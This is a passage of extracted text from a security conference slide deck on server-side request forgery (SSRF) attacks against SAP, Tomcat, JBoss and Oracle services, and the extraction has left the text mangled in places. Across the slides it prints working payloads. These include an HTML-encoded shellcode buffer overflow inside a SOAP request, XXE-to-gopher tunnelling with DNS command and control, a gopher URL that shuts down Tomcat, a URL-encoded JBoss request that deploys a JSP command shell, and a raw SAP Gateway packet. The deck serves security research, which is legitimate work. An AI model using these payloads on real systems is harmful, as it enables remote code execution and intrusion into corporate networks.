M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T0 82L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T 9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</ HEAP_EGG><NAME>&#186;&#255;&#255;&#206;&#060;&#102;&#129;&#202;&#255;&#015;&#066;&#082;&#106;&#067;&#088;&#205;& #046;&#060;&#005;&#090;&#116;&#239;&#184;&#100;&#115;&#101;&#099;&#139;&#250;&#175;&#117;&#234;&#175;&#117;&#231;&# 255;&#231;&#144;&#144;&#144;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#158;&#14;&#190; &#171;DSEC&#094;&#023;&#012;&#001;&#252;&#049;&#043;&#001;&#212;&#083;&#242;&#000;&#018;&#058;&#071;&#000;&#250;&# 047;&#057;&#016;&#076;&#255;&#084;&#000;&#001;&#002;&#000;&#000;&#226;&#020;&#095;&#000;&#064;&#000;&#000;&#000;&#0 97;&#125;&#088;&#016;&#115;&#167;&#113;&#002;&#117;&#218;&#157;&#000;&#004;&#128;&#069;&#000;&#082;&#089;&#012;&#01 6;&#235;&#004;&#235;&#002;&#134;&#027;&#198;&#000;&#255;&#255;&#233;&#077;&#255;&#255;&#255;&#255;AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-­‐ ENV:Body></SOAP-­‐ENV:Envelope>     61  
  • 62. XXE  Tunneling  to  Buffer  Overflow  (Hint  2)   •  Next  step  is  to  pack  this  packet  B  into  Packet  A     •  We  need  to  insert  non-­‐printable  symbols     •  God  bless  gopher;  it  supports  urlencode  like  HTTP   •  It  will  also  help  us  evade  aLack  against  IDS  systems       62   POST  /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post  HTTP/1.1   Host:  sapserver.com:80   Content-­‐Length:  7730     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://[Urlencoded  Packet  B]"  >]>    <foo>&date;</foo>   Packet  A  
  • 63. XXE  Tunneling  to  Buffer  Overflow  (Result)   63   Server  B  in  DMZ   (SAP  ERP)   Server  A  on  the   Internet   (SAP  XI)     hLp://company.com   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  sapserver.com:80     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://[packetB]"   >]>    <foo>&date;</foo>   Port  8000   WebRFC   service   Packet  B     Shellcode   service  with   DNS   payload   Packet  C  –  Command  and   Control  response  to  a^acker  by   DNS  protocol  which  is  allowed   for  outband  connecQons  
  • 64. Full  control  over  the  internal  system  through   the  Internet   64  
  • 65. So,  you  can  only  send  one  packet  by  gopher   but  you  can’t  control  the  session…   Hmm,  actually,  some8mes  you  can.     65  
  • 66. Session  handling  by  SSRF  (trick  1)   •  Using  Gopher,  it  is  possible  to  send  mul8ple  packets  in  one   session      Just  add  them  like  this   –  Gopher://[packet1][packet2][packet3].....   –  But  you  must  know  the  session  ID  or  use  a  protocol  without  session  ID   like  telnet   66   Successfully  tested  for  SAP  Message  Server  param.  change  
  • 67. Session  handling  by  SSRF  (trick  2)   •  Just  theoreQcal       •  Let’s  suppose  that  session  is  handled  by  the  IP  and  port  of  client   •  First  packet  is  sent  from  some  random  port,  for  example,  3000   •  Collect  info  about  the  session  from  the  response   •  Construct  the  second  packet  (next  8me,  the  source  port  will  be   3001,  3002…  etc.)   •  Send  the  second  packet  un8l  the  source  port  will  be  3000  again     67   Needs  tes8ng  
  • 68. Now  let’s  talk  about  different  SSRF  aLacks     When  we  aLack  the  same  host  with  SSRF   68  
  • 69. SSRF  back  connect  a^ack   •  Local  SSRF          The  idea  is  to  ini8ate  connec8on  to  localhost  services  in  Server  A   •  Counter-­‐a^ack            The  idea  of  this  aLack  is  to  send  Packet  A  to  Server  A  .  Service   must  take  Packet  B  and  send  it  to  the  aLacker’s  Server  C.  Server   C  will  make  a  malformed  response  to  server  A  and  trigger  a   client-­‐side  vulnerability  in  the  applica8on.     69  
  • 70. Local  SSRF   •  The  first  example  is  local  SSRF   •  We  try  to  aLack  localhost  ports  on  the  same  server  with  SSRF   •  There  are  a  lot  of  ports  listened  by  OS  and    applica8ons  at   localhost  and  usually  they  are  less  secure   70   Currently  working  on  a  database  of  most  interes8ng  ports  
  • 71. But  you  want  examples…  OK  OK!   71  
  • 72. Local  SSRF  to  Tomcat  shutdown     •  Tomcat  management  port  8005   •  Open  only  for  localhost   •  gopher://localhost:8005/SHUTDOWN%0d%0a   72   Successfully  exploitable  (tnx  Alexey  Sintsov)  
  • 73. Local  SSRF  to  Oracle  Listener     •  Problem   –  An  old  vulnerability  in  Oracle  listener  in  Set_log_file   –  Secured  by  LOCAL_OS_AUTHENTICATION  in  10G   •  ALack   –  User  with  CONNECT  privileges  can  run  UTL_TCP  func8ons   –  Using  UTL_TCP,  it  is  possible  to  construct  any  TCP  packet  and  send  it  to   the  listener   –  Connec8on  will  be  from  a  local  IP,  so  we  will  bypass   LOCAL_OS_AUTHENTICATION  restric8ons       73   Tested  in  early  2008  
  • 74. Local  SSRF  to  JBOSS  console     •  JBOSS  management  console  service   •  Even  with  a  simple  HTTP  request   •  Open  only  for  localhost                          hLp://localhost:8080/jmx-­‐console/HtmlAdaptor?ac8on=invokeOpByName&name=jboss.admin%3Aservice %3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argT ype=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d %22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c %48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e %41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e %50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c %49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e %20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e %67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c %29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b %20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e %74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d %65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e %67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f %75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f %75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d %20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e %70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e %70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d %20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d %20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b %20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f %70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True   74   tnx  Alexey  Sintsov  for  sploit  
  • 75. Bypass  SAP  security  restricQons   •  It  is  possible  to  bypass  many  SAP  Security  restric8ons  based  on  ACL     –  SAP  Gateway   –  SAP  Message  Server   –  Other  remote  services        gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A %67%77%2F%6D%61%78%5F%73%6C %65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE %D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE %D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA %1E %43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00 %00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C %00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C %48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE     75   Gateway  example  
  • 77. Counter-­‐a^ack  SSRF   •  This  is  the  most  interes8ng  way  to  use  SSRF,  which  was  not   discussed  before  .     •  We  send  a  command  from  Server  A  to  our  Server  C  using  SSRF,   and  then  we  generate  a  response  which  will  trigger  a   vulnerability  in  an  applica8on  from  Server  A.   •  Some  interes8ng  aLacks  are  also  possible.       77   New  life  for  client-­‐side  bugz  
  • 78. Counter-­‐a^ack  on  SMB  client   •  DoS  by  reading  huge  files  remotely   •  SMBRelay   •     RCE  Vulnerabili8es  in  SMB  client   –  MS10-­‐006   –  MS10-­‐020     –  MS11-­‐019   –  MS11-­‐043       78   Looking  for  a  working  example  of  client-­‐side  bug  
  • 79. Counter-­‐a^ack  on  FTP  client   •  Memory  corrup8on  vulnerabili8es  in  FTP  client.   –  Some  examples   hLps://www.corelan.be/index.php/2010/10/12/death-­‐of-­‐an-­‐vp-­‐client/   •  Client  path  traversal   –  Those  types  of  vulnerabili8es  are  rare  nowadays  but  there  are  some   chances  to  find  them  in  industrial  systems  because  they  were  created  a   long  8me  ago.         79   Working  on  real  examples  
  • 80. Counter-­‐a^ack  on  HTTP  client                The  most  widespread  type  of  SSRF  requests  is  HTTP.  It  means   that  vulnerabili7es  in  embedded  HTTP  clients  (which  are  used  by   different  XML  engines,  for  example)  are  the  most  sought-­‐a)er   part  of  our  future  research   –  DoS  by  mul8ple  en88es  with  links  to  big  data   –  DoS  by  mul8ple  GZIP  bombs         80   Working  on  real  examples  
  • 81. Counter-­‐a^ack  on  JAR  parser            XML  engines  support  jar:  scheme.  Calling  some  URL  using  this   scheme,  JAR  parser  opens  a  remote  archive  and  takes  a  file  from   it.  If  there  is  a  file  parsing  vulnerability  in  JAR  parser,  it  will  be   possible  to  a8ack  the  server.     •  Directory  traversal       –  Tested:  JDK  jar  parser  –  not  vulnerable   •  Jar  bombs         81   Working  on  real  examples  
  • 82. Counter-­‐a^ack  on  mailto:  parser                 •  mailto:%00%00.......................... ..//..//..//..//..//../../../../../../windows/system32/aaaa.exe   •  Successfully  read  the  file     •  There  should  be  an  RCE  but….         82   Found  yesterday    :)  
  • 83. 83  
  • 84. Conclusion?   84   “Let’s  put  it  under  a  firewall”   is  not  a  solu8on  anymore  
  • 86. Conclusion  2   •  SSRF  aLacks  are  very  dangerous   •  They  have  a  very  wide  range,  which  is  s8ll  poorly  covered   •  Gopher  example  is  not  the  only  one,  I  suppose   •  It  is  s8ll  a  big  research  area   •  A  lot  of  technologies  and  applica8ons  can  be  used  for  SSRF   •  I  only  check  those  places  where  I  am  working  a  lot   •  But  there  are  s8ll  many  uncovered  areas   •  OWASP-­‐EAS  SSRF  wiki   •  Let’s  make  the  biggest  database  of  SSRFs   •  Mail  me  if  you  have  any  ideas   86  
  • 87.     Web:                www.erpscan.com   e-­‐mail:        info@erpscan.com                                     TwiLer:      @erpscan                  @sh2kerr     87